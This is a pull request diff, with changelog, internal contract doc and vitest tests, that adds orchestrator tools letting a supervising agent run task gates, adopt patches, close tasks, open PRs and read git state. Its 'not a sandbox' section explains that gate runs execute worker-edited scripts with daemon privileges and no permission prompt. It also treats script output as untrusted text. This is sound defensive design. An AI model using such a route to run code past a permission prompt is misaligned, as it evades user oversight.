### PR TITLE
feat(worktask): gate runner, task-level adopt/close/pr and read-only git tools for the orchestrator

### DIFF
--- a/changelog.d/orch-o2.md
+++ b/changelog.d/orch-o2.md
@@ -3,10 +3,12 @@
 - Tasks can now be finished from an agent, not only from the GUI: `task_gate_run`
   runs a task's completion gate (its trusted verify script, or npm lint + test)
   inside the task's own worktree and reports a structured verdict; `task_adopt`
-  takes all of a task's changes into the parent repository as an unstaged patch;
-  `task_close` and `task_pr` close a task or open its pull request. Each refuses
-  with a named reason — a dirty worktree, unpushed commits, missing dependencies
-  — instead of failing silently.
+  takes all of a task's changes into the parent repository as a staged,
+  uncommitted patch; `task_close` and `task_pr` close a task or open its pull
+  request. Each refuses with a named reason — a dirty worktree, unpushed
+  commits, missing dependencies, a task branch that needs rebasing — instead of
+  failing silently, and an adopt that will not apply cleanly leaves the parent
+  repository untouched.
 - `git_status`, `git_log` and `gh_pr_view` read a task's worktree as data, so a
   supervising agent no longer has to infer what a task produced from a terminal
   screen.

--- a/changelog.d/orch-o2.md
+++ b/changelog.d/orch-o2.md
@@ -1,0 +1,22 @@
+### Added
+
+- Tasks can now be finished from an agent, not only from the GUI: `task_gate_run`
+  runs a task's completion gate (its trusted verify script, or npm lint + test)
+  inside the task's own worktree and reports a structured verdict; `task_adopt`
+  takes all of a task's changes into the parent repository as an unstaged patch;
+  `task_close` and `task_pr` close a task or open its pull request. Each refuses
+  with a named reason — a dirty worktree, unpushed commits, missing dependencies
+  — instead of failing silently.
+- `git_status`, `git_log` and `gh_pr_view` read a task's worktree as data, so a
+  supervising agent no longer has to infer what a task produced from a terminal
+  screen.
+
+### Changed
+
+- The sidebar's task list stays visible when it is empty, indents each task under
+  the workspace that started it, and summarises finished tasks in one line
+  instead of a list.
+- Multi Task asks for confirmation before launching tasks with no prompt at all,
+  and reports the launch in a single notification rather than one per task.
+- Settings names what the `claude-pty` orchestrator option changes: it switches
+  the Deck to a terminal interface.

--- a/docs/internal/orch-o2-tool-contract.md
+++ b/docs/internal/orch-o2-tool-contract.md
@@ -1,0 +1,152 @@
+# Lane O2 — tool + RPC contract
+
+What lane O2 delivers, and the exact strings another lane needs to register it.
+Nothing in this document is registered by lane O2: `src/mcp/index.ts`,
+`src/shared/commanderSurface.ts` and `src/shared/rpc.ts` belong to lane F, and
+`src/main/index.ts` is where the pipe handler is wired. Everything below already
+exists, compiles and is tested — it is not yet reachable.
+
+## 1. MCP tools
+
+Seven tools in two `register*` functions. Both take the same dependency object
+the fan-out tool takes (`getSenderPtyId` + `resolveWorkspaceId`, see
+`src/mcp/fanout.ts`); no tool has a workspace, worktree, repository, ref or
+command input, because every one of those is server-derived and a schema field
+would only invite calls the daemon rejects.
+
+```ts
+import { registerWorktaskTools } from './worktask';
+import { registerGitTools } from './git';
+
+registerWorktaskTools(server, { getSenderPtyId, resolveWorkspaceId });
+registerGitTools(server, { getSenderPtyId, resolveWorkspaceId });
+```
+
+| Tool | Schema | Pipe RPC |
+| --- | --- | --- |
+| `task_gate_run` | `{ task_id: z.string().min(1) }` | `task.gate.run` |
+| `task_adopt` | `{ task_id: z.string().min(1) }` | `task.adopt` |
+| `task_close` | `{ task_id: z.string().min(1) }` | `task.close` |
+| `task_pr` | `{ task_id: z.string().min(1), body?: z.string() }` | `task.pr` |
+| `git_status` | `{ task_id: z.string().min(1) }` | `task.git.status` |
+| `git_log` | `{ task_id: z.string().min(1), limit?: z.number().int().min(1).max(50) }` | `task.git.log` |
+| `gh_pr_view` | `{ task_id: z.string().min(1) }` | `task.gh.prView` |
+
+Descriptions live in the two source files and are the authority; they are
+written for the tools/list byte budget (short sentences, the refusal reasons
+named, no restatement of what the schema already says).
+
+There is deliberately **no `task_gate_cancel` tool**. The RPC
+(`task.gate.cancel`) exists and is registered, so adding one later is a
+three-line change — but the fixed name list for this lane has seven entries and
+a cancel is a rare, human-shaped action.
+
+## 2. Pipe RPCs to allow-list
+
+`registerWorktaskRpc` (in `src/main/pipe/handlers/worktask.rpc.ts`) registers
+these eight. They are exported as `WORKTASK_RPC_METHODS`, so the allow-list can
+quote the constant instead of retyping strings:
+
+```
+task.gate.run     task.gate.cancel
+task.adopt        task.close        task.pr
+task.git.status   task.git.log      task.gh.prView
+```
+
+Each needs to be added to the `RpcMethod` union **and** to `ALL_RPC_METHODS` in
+`src/shared/rpc.ts`. Until that happens the registration goes through one cast
+(`method as unknown as RpcMethod`), marked in the source; the cast disappears
+the moment the strings land.
+
+### `task.close` is teardown-class
+
+It removes a git worktree. It must be reviewed against
+`TEARDOWN_DENY_METHODS` on the commander surface
+(`src/shared/commanderSurface.ts`) before it is exposed to a brain — lane O2 has
+not made that call, only flagged it. Its own refusals already cover the
+destructive edges (a branch with unpushed commits, or a dirty worktree, is
+refused and the worktree preserved), so the question for lane F is policy, not
+safety-of-last-resort.
+
+`task.adopt` writes to the parent repository but only as an unstaged patch onto
+a **clean** tree, so it is recoverable with `git checkout .`; it is not
+teardown-class.
+
+## 3. Wiring in `src/main/index.ts`
+
+```ts
+import { registerWorktaskRpc } from './pipe/handlers/worktask.rpc';
+import { TaskAdoptService } from './worktask/TaskAdoptService';
+import { TaskGateRunner } from './worktask/TaskGateRunner';
+import { createDaemonLedgerPort } from './worktask/ledgerPort';
+
+registerWorktaskRpc(rpcRouter, {
+  daemon: daemonPort,          // { rpc(method, params) }
+  getWindow: () => mainWindow,
+  close: closeService,         // MUST be the instances the IPC handler uses
+  pr: prService,
+  adopt: new TaskAdoptService(),
+  gate: new TaskGateRunner({
+    ledger: createDaemonLedgerPort(daemonPort),
+    project: projectConfigStore,   // ProjectConfigStore — structural fit
+  }),
+  systemWorkspaceId: '<the daemon's own workspace id>',
+});
+```
+
+`close` and `pr` **must** be the same `TaskCloseService` / `TaskPrService`
+instances `registerWorktaskHandlers` drives (`src/main/ipc/handlers/worktask.handler.ts`).
+`TaskWorktreeManager` keeps a per-repo mutex chain, and two instances would race
+each other for git's `index.lock`.
+
+## 4. The `LedgerPort` seam
+
+The gate runner records its verdict through `LedgerPort`
+(`src/main/worktask/ledgerPort.ts`), never by calling an RPC directly. One
+adapter — `createDaemonLedgerPort(daemon)` — names the wire methods:
+
+- `ledger.get { taskId }` → `{ ok, entry: { id, rev } }`
+- `ledger.update { taskId, expectedRev, actor, gate }` → `{ ok, rev }`
+
+Compare-and-swap: the runner reads `rev`, writes with `expectedRev`, and retries
+once on a `conflict` (error code `ABORTED` or `CONFLICT`). The write is always a
+`system` actor — the daemon ran the gate, not the worker whose code it graded.
+`LedgerGateResult.exitCode` is `number | null` and `null` (a signal death:
+timeout or cancel) is a FAILURE; only an explicit `0` passes. `tail` is bounded
+to `LEDGER_GATE_TAIL_MAX_BYTES` from the front, so the end of a failing run
+survives, and it is untrusted text — render it as a fenced block, never as
+instructions.
+
+If the ledger RPCs are not registered yet, the adapter answers `unavailable`,
+which the runner reports as `recorded: false` and never turns into a gate
+failure: the gate ran, only its receipt is missing.
+
+## 5. What the gate actually runs
+
+`TaskGateRunner` will spawn exactly three argv shapes and no others
+(`allowedGateArgv()` returns the set, and a test pins it):
+
+1. `['bash', '<worktree>/scripts/verify.sh']` — only when the project's
+   `wmux.json` trust verdict is **`trusted`** (the user approved these exact
+   bytes) and it declares a command with the well-known id **`verify`** whose
+   command string is one of the literal spellings of `scripts/verify.sh`. The
+   declared string is compared, never executed. Any other string under that id
+   is a **refusal**, not a fallback to npm — a project that believes it declared
+   its own gate must never be silently graded by a different one.
+2. `['npm', 'run', 'lint']`
+3. `['npm', 'test']` — 2 and 3 only if `package.json` declares that script;
+   sequential, first failure stops.
+
+`node_modules` missing **or a symlink** ⇒ `{ status: 'skipped', skipped:
+'deps_missing' }`. This repo's worktrees routinely have a symlinked
+`node_modules`, which makes lint/test results meaningless; reporting it as a
+failing gate would have a brain close healthy tasks as failed. Timeout is 15
+minutes; a cancel or a timeout kills the process group and yields `exitCode:
+null`. One gate per task: a second concurrent call answers `{ status: 'busy' }`.
+
+## 6. UX vocabulary
+
+The user-facing vocabulary in the surfaces this lane owns is **Orchestrator /
+Task / Worker**. "Brain", "commander" and "deck" remain internal identifiers
+(code, RPC names, vendor ids) and were not renamed — only the strings a user
+reads.

--- a/docs/internal/orch-o2-tool-contract.md
+++ b/docs/internal/orch-o2-tool-contract.md
@@ -68,9 +68,19 @@ destructive edges (a branch with unpushed commits, or a dirty worktree, is
 refused and the worktree preserved), so the question for lane F is policy, not
 safety-of-last-resort.
 
-`task.adopt` writes to the parent repository but only as an unstaged patch onto
-a **clean** tree, so it is recoverable with `git checkout .`; it is not
-teardown-class.
+`task.adopt` writes to the parent repository, but only onto a **clean** tree and
+only as a staged, uncommitted patch (`--3way` needs the index for its merge), so
+it is recoverable with `git reset --hard`; it is not teardown-class. Its patch is taken against `merge-base(parent HEAD, task HEAD)`
+rather than the parent's HEAD — diffing against HEAD turns every commit the
+parent has and the task lacks into a *reversal*, so adopting a second task
+would silently delete the first one's work. No shared commit ⇒
+`reason: 'needs_rebase'`. The patch is validated with `git apply --check`
+before anything is written, and if the real `--3way` apply still fails the
+touched paths are restored (`reset` + `checkout` + `clean`) and the call
+answers `reason: 'conflict'` with those paths. Adopts are serialized per target
+repository, in-process — which closes the window this service creates (a brain
+adopting N tasks in a loop), not every window that exists (the GUI's own apply
+path and a second wmux instance are not covered).
 
 ## 3. Wiring in `src/main/index.ts`
 
@@ -117,9 +127,11 @@ to `LEDGER_GATE_TAIL_MAX_BYTES` from the front, so the end of a failing run
 survives, and it is untrusted text — render it as a fenced block, never as
 instructions.
 
-If the ledger RPCs are not registered yet, the adapter answers `unavailable`,
-which the runner reports as `recorded: false` and never turns into a gate
-failure: the gate ran, only its receipt is missing.
+If the ledger RPCs are not registered yet — which is the state today — the
+adapter answers `unavailable`, the runner reports `recorded: false`, and the
+gate is NOT failed: it ran, only its receipt is missing. The `task_gate_run`
+tool description says this, so a caller reading `recorded: false` does not
+conclude the gate was rejected.
 
 ## 5. What the gate actually runs
 
@@ -140,9 +152,46 @@ failure: the gate ran, only its receipt is missing.
 `node_modules` missing **or a symlink** ⇒ `{ status: 'skipped', skipped:
 'deps_missing' }`. This repo's worktrees routinely have a symlinked
 `node_modules`, which makes lint/test results meaningless; reporting it as a
-failing gate would have a brain close healthy tasks as failed. Timeout is 15
-minutes; a cancel or a timeout kills the process group and yields `exitCode:
-null`. One gate per task: a second concurrent call answers `{ status: 'busy' }`.
+failing gate would have a brain close healthy tasks as failed. A command that
+could not be started at all (ENOENT/EACCES) is `skipped: 'gate_unavailable'`,
+also not a failure. Timeout is 15 minutes and cannot be disabled (a
+non-positive value is clamped to the default); a cancel or a timeout kills the
+process group and yields `exitCode: null`. One gate per task: the slot is
+claimed synchronously, so a second concurrent call answers `{ status: 'busy' }`
+even when both arrive in the same tick.
+
+### The gate is not a sandbox — say this out loud
+
+The allow-list decides WHICH script runs. It does not, and cannot, constrain
+what that script DOES: `scripts/verify.sh` and the `lint` / `test` entries in
+`package.json` are files inside the task worktree, which is the tree the worker
+has been editing. A gate run therefore executes worker-controlled code in a
+daemon-spawned process with the daemon's user, environment and filesystem
+access — the same privileges a pane agent already has, but reached without a
+pane and without a permission prompt.
+
+Two consequences for whoever wires this up:
+
+- Do not expose `task_gate_run` on a surface whose caller is less trusted than
+  someone who could have typed `npm test` in that directory themselves. Today's
+  callers (a brain bound to the workspace that owns the task) clear that bar;
+  a remote or third-party surface would not, which is part of why the RPCs are
+  local-origin only.
+- The recorded `command` names the script, not its content, and `tail` is
+  whatever the script printed. Both are untrusted text — render the tail as a
+  fenced block, never as instructions.
+
+The `wmux.json` trust check picks between two gates. It is not, and must not be
+described as, evidence that the code being graded is safe to run.
+
+### The trust verdict is read at the PARENT repository
+
+`ProjectConfigStore` keys trust records by the path the user approved — the
+repository they opened. A `wtask/…` worktree the daemon created minutes ago has
+never appeared in a trust dialog, so looking the verdict up there always
+answered `untrusted`. `task.gate.run` therefore resolves the parent repo root
+(the same derivation `task.close` uses) and passes it as `projectRoot`: the
+config is READ there, the script still RUNS in the worktree.
 
 ## 6. UX vocabulary
 

--- a/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
+++ b/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
@@ -14,7 +14,15 @@ vi.mock('../../../git/git', () => ({ git: vi.fn() }));
 
 import { resolvePtyOwnerWorkspace } from '../../../workspace/ptyOwnership';
 import { git } from '../../../git/git';
-import { registerWorktaskRpc, WORKTASK_RPC_METHODS, type WorktaskRpcDeps } from '../worktask.rpc';
+import {
+  parseGitLog,
+  parseGitStatus,
+  registerWorktaskRpc,
+  TASK_GIT_LOG_MAX,
+  WORKTASK_RPC_METHODS,
+  type WorktaskExec,
+  type WorktaskRpcDeps,
+} from '../worktask.rpc';
 import type { RpcContext } from '../../../../shared/rpc';
 import type { RpcRouter } from '../../RpcRouter';
 import type { TaskAdoptService } from '../../../worktask/TaskAdoptService';
@@ -36,6 +44,7 @@ type Handler = (params: Record<string, unknown>, ctx?: RpcContext) => Promise<Re
 
 interface Harness {
   call: (method: string, params: Record<string, unknown>, ctx?: RpcContext) => Promise<Record<string, unknown>>;
+  exec: ReturnType<typeof vi.fn>;
   closeTask: ReturnType<typeof vi.fn>;
   createPr: ReturnType<typeof vi.fn>;
   adopt: ReturnType<typeof vi.fn>;
@@ -44,7 +53,12 @@ interface Harness {
   missionListParams: () => Record<string, unknown> | undefined;
 }
 
-function harness(opts?: { tasks?: unknown[]; ownerWorkspaceId?: string | null; onDisk?: boolean }): Harness {
+function harness(opts?: {
+  tasks?: unknown[];
+  ownerWorkspaceId?: string | null;
+  onDisk?: boolean;
+  exec?: WorktaskExec;
+}): Harness {
   const handlers = new Map<string, Handler>();
   const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
 
@@ -76,8 +90,11 @@ function harness(opts?: { tasks?: unknown[]; ownerWorkspaceId?: string | null; o
   const owner = opts?.ownerWorkspaceId === undefined ? CALLER_WS : opts.ownerWorkspaceId;
   vi.mocked(resolvePtyOwnerWorkspace).mockImplementation(async () => owner);
 
+  const exec = vi.fn(opts?.exec ?? (async () => ({ stdout: '', stderr: '', code: 0 })));
+
   const deps: WorktaskRpcDeps = {
     daemon,
+    exec: exec as unknown as WorktaskExec,
     getWindow: () => null,
     close: { closeTask } as unknown as TaskCloseService,
     pr: { createPr } as unknown as TaskPrService,
@@ -98,6 +115,7 @@ function harness(opts?: { tasks?: unknown[]; ownerWorkspaceId?: string | null; o
     adopt,
     gateRun,
     gateCancel,
+    exec,
     missionListParams: () => missionParams,
   };
 }
@@ -107,7 +125,7 @@ beforeEach(() => {
 });
 
 describe('registration', () => {
-  it('registers exactly the five contracted methods', () => {
+  it('registers exactly the contracted methods', () => {
     const handlers = new Map<string, Handler>();
     const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
     registerWorktaskRpc(router, {
@@ -287,5 +305,102 @@ describe('task.pr', () => {
     const res = await h.call('task.pr', { taskId: TASK.id, senderPtyId: 'pty-1' });
     expect(res).toMatchObject({ ok: false, error: { code: 'FAILED_PRECONDITION' } });
     expect(h.createPr).not.toHaveBeenCalled();
+  });
+});
+
+
+describe('task.git.status', () => {
+  it('runs a fixed argv in the task worktree and returns structure, not text', async () => {
+    const h = harness({
+      exec: async () => ({ stdout: '## wtask/lane-one...origin/wtask/lane-one [ahead 2]\n M src/a.ts\n?? src/new.ts\n', stderr: '', code: 0 }),
+    });
+    const res = await h.call('task.git.status', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.exec).toHaveBeenCalledWith('git', ['status', '--porcelain=v1', '--branch'], TASK.worktreePath);
+    expect(res).toMatchObject({
+      ok: true,
+      branch: 'wtask/lane-one',
+      ahead: 2,
+      behind: 0,
+      clean: false,
+      files: [
+        { status: ' M', path: 'src/a.ts' },
+        { status: '??', path: 'src/new.ts' },
+      ],
+    });
+  });
+
+  it('reports a git failure as data', async () => {
+    const h = harness({ exec: async () => ({ stdout: '', stderr: 'not a git repository', code: 128 }) });
+    expect(await h.call('task.git.status', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: false,
+      reason: 'git-failed',
+    });
+  });
+});
+
+describe('task.git.log', () => {
+  it('clamps the limit instead of refusing, and reports what ran', async () => {
+    const h = harness({ exec: async () => ({ stdout: '', stderr: '', code: 0 }) });
+    const res = await h.call('task.git.log', { taskId: TASK.id, senderPtyId: 'pty-1', limit: 500 });
+    expect(res).toMatchObject({ ok: true, limit: TASK_GIT_LOG_MAX });
+    expect(h.exec.mock.calls[0]?.[1]).toContain(String(TASK_GIT_LOG_MAX));
+  });
+
+  it('rejects a limit that is not a positive integer', async () => {
+    const h = harness();
+    expect(await h.call('task.git.log', { taskId: TASK.id, senderPtyId: 'pty-1', limit: 0 })).toMatchObject({
+      ok: false,
+      error: { code: 'INVALID_ARGUMENT' },
+    });
+    expect(await h.call('task.git.log', { taskId: TASK.id, senderPtyId: 'pty-1', limit: 'all' })).toMatchObject({
+      ok: false,
+      error: { code: 'INVALID_ARGUMENT' },
+    });
+  });
+
+  it('parses the separator-delimited commit lines', async () => {
+    const line = ['abc', 'A Dev', '2026-09-04T00:00:00Z', 'fix: a subject with -- dashes'].join('\u001f');
+    const h = harness({ exec: async () => ({ stdout: `${line}\n`, stderr: '', code: 0 }) });
+    const res = await h.call('task.git.log', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect((res as { commits: unknown[] }).commits).toEqual([
+      { hash: 'abc', author: 'A Dev', date: '2026-09-04T00:00:00Z', subject: 'fix: a subject with -- dashes' },
+    ]);
+  });
+});
+
+describe('task.gh.prView', () => {
+  it('returns the parsed PR json', async () => {
+    const h = harness({ exec: async () => ({ stdout: '{"number":7,"state":"OPEN"}', stderr: '', code: 0 }) });
+    const res = await h.call('task.gh.prView', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.exec.mock.calls[0]?.[0]).toBe('gh');
+    expect(res).toMatchObject({ ok: true, pr: { number: 7, state: 'OPEN' } });
+  });
+
+  it('reports "no PR" as data rather than as a failure', async () => {
+    const h = harness({ exec: async () => ({ stdout: '', stderr: 'no pull requests found', code: 1 }) });
+    expect(await h.call('task.gh.prView', { taskId: TASK.id, senderPtyId: 'pty-1' })).toMatchObject({
+      ok: false,
+      reason: 'no-pr',
+    });
+  });
+});
+
+describe('porcelain parsing', () => {
+  it('reads a rename as its destination path', () => {
+    const parsed = parseGitStatus('## main\nR  old.ts -> new.ts\n');
+    expect(parsed.files).toEqual([{ status: 'R ', path: 'new.ts' }]);
+  });
+
+  it('reports a branch with no upstream and no changes as clean', () => {
+    const parsed = parseGitStatus('## wtask/x\n');
+    expect(parsed).toMatchObject({ branch: 'wtask/x', ahead: 0, behind: 0, clean: true });
+  });
+
+  it('reads ahead and behind together', () => {
+    expect(parseGitStatus('## a...origin/a [ahead 1, behind 3]\n')).toMatchObject({ ahead: 1, behind: 3 });
+  });
+
+  it('ignores empty log output', () => {
+    expect(parseGitLog('')).toEqual([]);
   });
 });

--- a/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
+++ b/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
@@ -58,6 +58,8 @@ function harness(opts?: {
   ownerWorkspaceId?: string | null;
   onDisk?: boolean;
   exec?: WorktaskExec;
+  /** 'throw' = transport failure, 'not-ok' = the daemon refusing. */
+  missionList?: 'throw' | 'not-ok';
 }): Harness {
   const handlers = new Map<string, Handler>();
   const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
@@ -79,6 +81,8 @@ function harness(opts?: {
     rpc: vi.fn(async (method: string, params: Record<string, unknown>) => {
       if (method !== 'task.mission.list') throw new Error(`unexpected daemon rpc: ${method}`);
       missionParams = params;
+      if (opts?.missionList === 'throw') throw new Error('daemon socket closed');
+      if (opts?.missionList === 'not-ok') return { ok: false, error: { message: 'mission log unavailable' } };
       return { ok: true, tasks: opts?.tasks ?? [TASK] };
     }),
   };
@@ -194,10 +198,14 @@ describe('task.gate.run', () => {
   it('runs the gate in the task worktree as a system actor', async () => {
     const h = harness();
     const res = await h.call('task.gate.run', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    // The wmux.json trust verdict is keyed by the parent repository, never by a
+    // wtask/ worktree the daemon minted (which has no trust record at all, so
+    // the whole verify branch was dead).
     expect(h.gateRun).toHaveBeenCalledWith({
       taskId: TASK.id,
       worktreePath: TASK.worktreePath,
       systemWorkspaceId: 'ws-daemon',
+      projectRoot: '/repo',
     });
     expect(res).toMatchObject({ ok: true, status: 'completed', title: TASK.title });
   });
@@ -312,10 +320,14 @@ describe('task.pr', () => {
 describe('task.git.status', () => {
   it('runs a fixed argv in the task worktree and returns structure, not text', async () => {
     const h = harness({
-      exec: async () => ({ stdout: '## wtask/lane-one...origin/wtask/lane-one [ahead 2]\n M src/a.ts\n?? src/new.ts\n', stderr: '', code: 0 }),
+      exec: async () => ({
+        stdout: '## wtask/lane-one...origin/wtask/lane-one [ahead 2]\0 M src/a.ts\0?? src/new.ts\0',
+        stderr: '',
+        code: 0,
+      }),
     });
     const res = await h.call('task.git.status', { taskId: TASK.id, senderPtyId: 'pty-1' });
-    expect(h.exec).toHaveBeenCalledWith('git', ['status', '--porcelain=v1', '--branch'], TASK.worktreePath);
+    expect(h.exec).toHaveBeenCalledWith('git', ['status', '--porcelain=v1', '--branch', '-z'], TASK.worktreePath);
     expect(res).toMatchObject({
       ok: true,
       branch: 'wtask/lane-one',
@@ -386,21 +398,84 @@ describe('task.gh.prView', () => {
 });
 
 describe('porcelain parsing', () => {
-  it('reads a rename as its destination path', () => {
-    const parsed = parseGitStatus('## main\nR  old.ts -> new.ts\n');
-    expect(parsed.files).toEqual([{ status: 'R ', path: 'new.ts' }]);
+  it('reads a rename as its destination and consumes the origin record', () => {
+    const parsed = parseGitStatus('## main\0R  new.ts\0old.ts\0 M other.ts\0');
+    expect(parsed.files).toEqual([
+      { status: 'R ', path: 'new.ts' },
+      { status: ' M', path: 'other.ts' },
+    ]);
+  });
+
+  // Without -z git quotes non-ASCII paths and splits a path containing a
+  // newline across two lines, so a caller acting on `path` was handed a name
+  // that does not exist on disk.
+  it('keeps a path containing a newline as one entry', () => {
+    expect(parseGitStatus('## main\0 M src/a\nb.ts\0').files).toEqual([{ status: ' M', path: 'src/a\nb.ts' }]);
+  });
+
+  it('reads a non-ASCII path verbatim rather than git-quoted', () => {
+    expect(parseGitStatus('## main\0 M src/é.ts\0').files).toEqual([{ status: ' M', path: 'src/é.ts' }]);
   });
 
   it('reports a branch with no upstream and no changes as clean', () => {
-    const parsed = parseGitStatus('## wtask/x\n');
+    const parsed = parseGitStatus('## wtask/x\0');
     expect(parsed).toMatchObject({ branch: 'wtask/x', ahead: 0, behind: 0, clean: true });
   });
 
   it('reads ahead and behind together', () => {
-    expect(parseGitStatus('## a...origin/a [ahead 1, behind 3]\n')).toMatchObject({ ahead: 1, behind: 3 });
+    expect(parseGitStatus('## a...origin/a [ahead 1, behind 3]\0')).toMatchObject({ ahead: 1, behind: 3 });
   });
 
   it('ignores empty log output', () => {
     expect(parseGitLog('')).toEqual([]);
+  });
+});
+
+// ── A closed or detached task is not something to act on ───────────────────
+// Its worktree has been removed (closed) or deliberately handed away
+// (detached); running a gate or opening a PR there is at best a confusing git
+// error and at worst work done in a directory nobody is watching.
+describe.each(['task.gate.run', 'task.adopt', 'task.pr'])('%s — the task must still be live', (method) => {
+  it('refuses a closed task', async () => {
+    const h = harness({ tasks: [{ ...TASK, status: 'closed' }] });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'FAILED_PRECONDITION' } });
+  });
+
+  it('refuses a detached task', async () => {
+    const h = harness({ tasks: [{ ...TASK, detachedAt: 1 }] });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'FAILED_PRECONDITION' } });
+  });
+});
+
+describe('reads and close still work on a finished task', () => {
+  it.each(['task.git.status', 'task.git.log', 'task.gh.prView'])('%s reads a closed task', async (method) => {
+    const h = harness({ tasks: [{ ...TASK, status: 'closed' }] });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).not.toMatchObject({ error: { code: 'FAILED_PRECONDITION' } });
+  });
+
+  it('task.close reconciles an already-closed task instead of refusing', async () => {
+    const h = harness({ tasks: [{ ...TASK, status: 'closed' }] });
+    await h.call('task.close', { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(h.closeTask).toHaveBeenCalled();
+  });
+});
+
+// ── A daemon outage is not "no such task" ──────────────────────────────────
+// NOT_FOUND is the one answer that tells a caller to stop retrying and go look
+// for a bug in its own bookkeeping.
+describe.each(WORKTASK_RPC_METHODS)('%s — daemon reachability', (method) => {
+  it('reports a transport failure as UNAVAILABLE', async () => {
+    const h = harness({ missionList: 'throw' });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'UNAVAILABLE' } });
+  });
+
+  it('reports a refusing daemon as UNAVAILABLE too', async () => {
+    const h = harness({ missionList: 'not-ok' });
+    const res = await h.call(method, { taskId: TASK.id, senderPtyId: 'pty-1' });
+    expect(res).toMatchObject({ ok: false, error: { code: 'UNAVAILABLE' } });
   });
 });

--- a/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
+++ b/src/main/pipe/handlers/__tests__/worktask.rpc.test.ts
@@ -1,0 +1,291 @@
+// ─── task.gate.* / task.adopt / task.close / task.pr — the wire trust boundary ─
+//
+// These five methods let a non-human close tasks, write to repositories and open
+// PRs, so what is pinned here is the REFUSALS: a remote caller, a stated
+// identity, a task someone else owns, a task that never materialized. The happy
+// paths are asserted only to the extent of "the same service the GUI drives was
+// called with server-derived arguments" — the services' own behaviour (close
+// ordering, gh gates) is pinned in their own tests.
+
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+vi.mock('../../../workspace/ptyOwnership', () => ({ resolvePtyOwnerWorkspace: vi.fn() }));
+vi.mock('../../../git/git', () => ({ git: vi.fn() }));
+
+import { resolvePtyOwnerWorkspace } from '../../../workspace/ptyOwnership';
+import { git } from '../../../git/git';
+import { registerWorktaskRpc, WORKTASK_RPC_METHODS, type WorktaskRpcDeps } from '../worktask.rpc';
+import type { RpcContext } from '../../../../shared/rpc';
+import type { RpcRouter } from '../../RpcRouter';
+import type { TaskAdoptService } from '../../../worktask/TaskAdoptService';
+import type { TaskCloseService } from '../../../worktask/TaskCloseService';
+import type { TaskGateRunner } from '../../../worktask/TaskGateRunner';
+import type { TaskPrService } from '../../../worktask/TaskPrService';
+
+const LOCAL: RpcContext = { origin: 'local' };
+const CALLER_WS = 'ws-caller';
+const TASK = {
+  id: 'wtask-1',
+  title: 'lane one',
+  status: 'open' as const,
+  branch: 'wtask/lane-one',
+  worktreePath: '/wt/lane-one',
+};
+
+type Handler = (params: Record<string, unknown>, ctx?: RpcContext) => Promise<Record<string, unknown>>;
+
+interface Harness {
+  call: (method: string, params: Record<string, unknown>, ctx?: RpcContext) => Promise<Record<string, unknown>>;
+  closeTask: ReturnType<typeof vi.fn>;
+  createPr: ReturnType<typeof vi.fn>;
+  adopt: ReturnType<typeof vi.fn>;
+  gateRun: ReturnType<typeof vi.fn>;
+  gateCancel: ReturnType<typeof vi.fn>;
+  missionListParams: () => Record<string, unknown> | undefined;
+}
+
+function harness(opts?: { tasks?: unknown[]; ownerWorkspaceId?: string | null; onDisk?: boolean }): Harness {
+  const handlers = new Map<string, Handler>();
+  const router = { register: (m: string, h: Handler) => handlers.set(m, h) } as unknown as RpcRouter;
+
+  const closeTask = vi.fn(async () => ({ ok: true, taskId: TASK.id, archivePending: false }));
+  const createPr = vi.fn(async () => ({ ok: true, prUrl: 'https://example.test/pr/1' }));
+  const adopt = vi.fn(async () => ({ ok: true, taskId: TASK.id, targetRepo: '/repo', files: ['a.ts'] }));
+  const gateRun = vi.fn(async () => ({
+    ok: true,
+    status: 'completed',
+    taskId: TASK.id,
+    result: { exitCode: 0, tail: '', at: 1, command: 'npm test' },
+    recorded: true,
+  }));
+  const gateCancel = vi.fn(() => true);
+
+  let missionParams: Record<string, unknown> | undefined;
+  const daemon = {
+    rpc: vi.fn(async (method: string, params: Record<string, unknown>) => {
+      if (method !== 'task.mission.list') throw new Error(`unexpected daemon rpc: ${method}`);
+      missionParams = params;
+      return { ok: true, tasks: opts?.tasks ?? [TASK] };
+    }),
+  };
+
+  // Every `git rev-parse` in the close path answers with the parent repo, so
+  // the repo derivation succeeds and the close service is reached.
+  vi.mocked(git).mockResolvedValue({ stdout: '/repo\n', stderr: '', code: 0 });
+
+  const owner = opts?.ownerWorkspaceId === undefined ? CALLER_WS : opts.ownerWorkspaceId;
+  vi.mocked(resolvePtyOwnerWorkspace).mockImplementation(async () => owner);
+
+  const deps: WorktaskRpcDeps = {
+    daemon,
+    getWindow: () => null,
+    close: { closeTask } as unknown as TaskCloseService,
+    pr: { createPr } as unknown as TaskPrService,
+    adopt: { adopt } as unknown as TaskAdoptService,
+    gate: { run: gateRun, cancel: gateCancel } as unknown as TaskGateRunner,
+    fileExists: () => opts?.onDisk !== false,
+  };
+  registerWorktaskRpc(router, deps);
+
+  return {
+    call: async (method, params, ctx = LOCAL) => {
+      const h = handlers.get(method);
+      if (!h) throw new Error(`${method} was not registered`);
+      return h(params, ctx);
+    },
+    closeTask,
+    createPr,
+    adopt,
+    gateRun,
+    gateCancel,
+    missionListParams: () => missionParams,
+  };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+});
+
